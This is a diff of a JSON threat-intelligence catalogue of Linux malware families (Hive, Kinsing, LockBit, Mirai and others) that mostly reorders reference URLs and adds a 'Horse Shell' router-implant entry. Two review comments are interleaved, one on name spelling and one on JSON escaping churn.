+ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
+ "https://blog.avast.com/hide-n-seek-botnet-continues"
 ],
 "synonyms": [
 "HNS"
@@ -4969,26 +5158,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive",
- "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
- "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
- "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
- "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
 "https://github.com/reecdeep/HiveV5_file_decryptor",
- "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://arxiv.org/pdf/2202.08477.pdf",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://twitter.com/malwrhunterteam/status/1455628865229950979",
- "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
 "https://twitter.com/ESETresearch/status/1454100591261667329",
+ "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
+ "https://twitter.com/malwrhunterteam/status/1455628865229950979",
+ "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
+ "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
+ "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/",
 "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
- "https://blog.group-ib.com/hive",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
 "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
+ "https://blog.group-ib.com/hive",
+ "https://arxiv.org/pdf/2202.08477.pdf",
 "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
 "https://github.com/rivitna/Malware/tree/main/Hive"
 ],
 "synonyms": [],
@@ -4997,6 +5187,19 @@
 "uuid": "c22452c8-c818-4577-9737-0b87342c7913",
 "value": "Hive (ELF)"
 },
+ {
+ "description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor \u201cCamaro Dragon\u201d, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell",
+ "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9d04d96a-92fd-4731-a3b5-a3fdafd3e523",
+ "value": "Horse Shell"
+ },
 {
 "description": "",
 "meta": {
@@ -5062,11 +5265,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm",
- "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf",
- "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/",
 "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf"
 ],
 "synonyms": [
 "InterPlanetary Storm"
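Review bot: The new Horse Shell entry is inconsistent about the family name: `"value": "Horse Shell"` carries a space, while the description and the malpedia identifier `elf.horseshell` use `HorseShell`, and `"synonyms": []` is left empty, so a lookup by the spelled-together form will not match this cluster element. Adding `"synonyms": ["HorseShell"]` (or using that spelling as the value) keeps the galaxy searchable under both forms. The description also writes the vendor as `Checkpoint Research`, whereas the cited URL is on research.checkpoint.com and the company spells its name Check Point; worth aligning if the description is curated here rather than copied verbatim from upstream.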
@@ -5094,12 +5297,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
- "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/",
- "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/",
 "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/",
+ "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
+ "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -5112,12 +5315,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten",
- "https://www.lacework.com/blog/the-kek-security-network/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day",
- "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/",
- "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf",
 "https://www.lacework.com/the-kek-security-network/",
- "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
+ "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/",
+ "https://www.lacework.com/blog/the-kek-security-network/",
+ "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf",
+ "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day"
 ],
 "synonyms": [
 "STD"
@@ -5132,10 +5335,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods",
- "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916",
- "https://blog.talosintelligence.com/2019/09/watchbog-patching.html",
- "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/",
+ "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916",
+ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "https://blog.talosintelligence.com/2019/09/watchbog-patching.html",
 "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html"
 ],
 "synonyms": [],
@@ -5149,11 +5352,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.keyplug",
+ "https://experience.mandiant.com/trending-evil/p/1",
 "https://www.mandiant.com/resources/apt41-us-state-governments",
 "https://twitter.com/CyberJack42/status/1501290277864046595",
- "https://www.mandiant.com/resources/mobileiron-log4shell-exploitation",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf",
+ "https://www.mandiant.com/resources/mobileiron-log4shell-exploitation"
 ],
 "synonyms": [
 "ELFSHELF"
@@ -5181,25 +5385,26 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing",
- "https://unit42.paloaltonetworks.com/atoms/moneylibra/",
- "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
- "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
- "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
 "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability",
- "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
+ "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
 "https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
- "https://twitter.com/IntezerLabs/status/1259818964848386048",
 "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://unit42.paloaltonetworks.com/cve-2020-25213/",
- "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html",
- "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
+ "https://twitter.com/IntezerLabs/status/1259818964848386048",
 "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/",
+ "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://unit42.paloaltonetworks.com/atoms/moneylibra/",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
 "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
+ "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html",
+ "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html",
+ "https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability",
+ "https://unit42.paloaltonetworks.com/cve-2020-25213/",
+ "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
+ "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/"
 ],
 "synonyms": [
 "h2miner"
@@ -5227,9 +5432,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos",
- "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
 "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
+ "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/",
 "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf"
 ],
 "synonyms": [],
@@ -5327,21 +5532,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit", - "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", - "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/", - "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", - "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf", - "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://security.packt.com/understanding-lockbit/", - "https://analyst1.com/ransomware-diaries-volume-1/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://www.ic3.gov/Media/News/2022/220204.pdf", "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/", + "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", + "https://analyst1.com/ransomware-diaries-volume-1/", + "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf", + "https://www.ic3.gov/Media/News/2022/220204.pdf", + "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", + 
"https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants", + "https://github.com/prodaft/malware-ioc/tree/master/PTI-257", + "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://securelist.com/crimeware-report-lockbit-switchsymb/110068/", + "https://security.packt.com/understanding-lockbit/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html" ], "synonyms": [], "type": [] @@ -5354,9 +5563,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas", + "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html", "https://www.cadosecurity.com/2020/05/16/1318/", - "https://twitter.com/nunohaien/status/1261281419483140096", - "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html" + "https://twitter.com/nunohaien/status/1261281419483140096" ], "synonyms": [], "type": [] 
@@ -5423,9 +5632,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", + "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", - "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes", - "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7" + "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" ], "synonyms": [ "PureMasuta" @@ -5453,10 +5662,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.melofee", - "https://blog.exatrack.com/melofee/" + "https://blog.exatrack.com/melofee/", + "https://asec.ahnlab.com/en/55785/", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [ - "Mélofée" + "M\u00e9lof\u00e9e" ], "type": [] }, 
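Review bot: The synonym change in the Mélofée entry (`"Mélofée"` → `"M\u00e9lof\u00e9e"`) is not a content change — both spellings decode to the same string — so it looks like the serializer was run with ASCII escaping turned on, which the rest of this file did not use (compare the literal em dashes on the old side of the QNAPCrypt description later in this patch). That produces churn on every non-ASCII value and hides the two refs that are actually new here (`asec.ahnlab.com/en/55785/`, the Sekoia China-threat overview). I would keep one encoding across the file, most simply by serializing with `ensure_ascii=False` (or letting the repository's JSON normalization pass decide), so a diff of this cluster shows only real additions and removals.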
@@ -5469,12 +5680,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap", "https://attack.mitre.org/groups/G0096", + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/" + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] @@ -5487,8 +5698,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim", - "https://github.com/guitmz/midrashim", - "https://www.guitmz.com/linux-midrashim-elf-virus/" + "https://www.guitmz.com/linux-midrashim-elf-virus/", + "https://github.com/guitmz/midrashim" ], "synonyms": [], "type": [] @@ -5501,8 +5712,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", - "https://securitykitten.github.io/2016/12/14/mikey.html", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md" + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md", + "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] 
@@ -5515,66 +5726,73 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", - "https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/", - "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/", - "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", - "https://isc.sans.edu/diary/22786", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "http://osint.bambenekconsulting.com/feeds/", - "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/", - "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/", - "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/", - "https://community.riskiq.com/article/d8a78daf", - "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", - "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", - "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", - "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", - "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts", - "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18", - 
"https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", - "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/", - "https://cert.gov.ua/article/37139", - "https://synthesis.to/2021/06/30/automating_string_decryption.html", - "https://www.youtube.com/watch?v=KVJyYTie-Dc", - "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/", - "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", - "https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability", - "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants", - "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/", - "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", - "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", - "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", - "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/", - "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet", - "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", - "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine", - "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", - 
"https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", - "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", - "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", - "https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai", - "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", - "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", - "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", + "https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/", "https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", - "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html", - "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign", - "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", - "https://github.com/jgamblin/Mirai-Source-Code", - "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/", + "http://osint.bambenekconsulting.com/feeds/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", + "https://www.youtube.com/watch?v=KVJyYTie-Dc", + 
"https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", + "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/", + "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", + "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", + "https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability", + "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", + "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/", + "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", + "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", + "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/", + "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", + "https://unit42.paloaltonetworks.com/new-mirai-variant-mukashi/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + 
"https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", + "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18", + "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", + "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign", + "https://community.riskiq.com/article/d8a78daf", + "https://unit42.paloaltonetworks.com/cve-2020-17496/", + "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/", + "https://github.com/jgamblin/Mirai-Source-Code", + "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", + "https://isc.sans.edu/diary/22786", + "https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/", + "https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/", + "https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/", + 